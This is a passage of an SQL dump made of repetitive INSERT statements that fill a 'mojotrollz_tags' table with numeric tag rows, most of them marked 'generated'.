`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24487, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24488, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24489, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24490, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24492, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24493, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24496, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24498, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24500, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24501, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24502, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24503, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24504, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24505, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24507, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24508, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24510, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24511, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24512, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24513, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24514, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24515, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24516, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24517, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24518, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24519, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24520, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24528, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24529, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24530, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24531, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24532, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24533, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24534, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24536, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24537, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24538, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24539, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24541, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24542, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24543, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24544, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24545, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24546, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24547, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24548, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24550, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24551, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24552, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24555, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24556, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24562, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24563, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24564, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24566, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24568, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24600, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24601, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24606, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24607, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24613, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24616, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24627, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24631, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24632, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24633, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24634, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24635, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24653, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24654, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24686, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24687, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24715, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24717, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24723, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24724, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24725, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24726, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24727, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24728, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24729, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24745, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24746, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24760, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24761, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24762, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24763, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24764, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24776, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24777, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24798, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25328, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25329, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25330, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25331, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25332, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25333, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25336, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25337, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25338, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25339, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25340, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25341, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25342, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25346, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25347, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25348, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25349, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (26449, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (26494, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (26495, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (26496, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (26499, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28024, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28027, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28028, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28029, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28030, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28031, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28032, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28033, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28034, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28037, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28038, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28040, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28041, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28042, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28044, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28047, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28048, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28050, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28051, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28052, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28053, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28054, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28055, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28056, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28069, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28070, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28071, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28072, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28073, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28074, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28075, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28603, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28604, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28605, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28606, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28607, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28608, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28609, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28610, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28611, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28612, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28613, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29150, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29151, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29152, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29154, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29155, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29740, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29741, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29742, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29743, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29744, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29745, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29746, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29747, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29748, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29749, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29750, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29751, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29752, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29753, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29754, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29755, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29756, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29757, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29758, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29759, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29760, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29761, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29762, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29763, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29764, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29765, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29766, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29767, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29768, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29769, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29770, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29771, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29772, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29773, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29774, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29775, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29776, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29777, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29780, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29781, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29782, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29783, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29784, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29784, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (30854, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (30855, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (30856, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31407, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31408, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31409, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31410, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31411, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31442, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31504, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31507, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31508, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31509, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31510, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31511, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31572, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31573, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31574, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31575, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31576, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31577, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31578, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31579, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31580, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32107, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32109, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32110, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32349, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32355, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32358, 2, 1, 0, 'generated'); INSERT INTO 